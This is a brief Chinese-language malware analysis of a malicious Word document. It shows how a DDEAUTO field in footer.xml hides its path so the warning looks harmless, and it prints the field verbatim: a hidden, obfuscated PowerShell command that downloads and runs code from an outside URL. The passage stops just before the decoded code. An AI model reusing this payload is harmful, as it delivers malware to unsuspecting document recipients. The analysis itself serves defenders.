当你打开恶意docx文件时,会有提示信息,不过通过解析路径的手段,把可疑部分隐藏了。
这个提示信息,看起来是启动我Word安装目录下的一个程序,普通人觉得,Word启动它自己目录下的程序,应该很正常呀!于是就点了是
此时用procexp查看进程列表,恶意的代码已经执行了~
如果用7z来打开这个docx文件,可以看到里面的footer.xml文件中包含的恶意部分
DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord\\..\\..\\..\\..\\..\\Windows\\system32\\cmd.exe /c
pOWeRShELl.exe -NoP -W Hidden IEX(nEw-oBjECt sYstEM.nEt.wEBcLIeNt).dOWnLoADsTRiNg('http://stinky.esy.es/ip.php');
#" "Financial Security Institue RFRE System"
powershell.exe会从'http://stinky.esy.es/ip.php
下载新的ps代码执行
代码还原后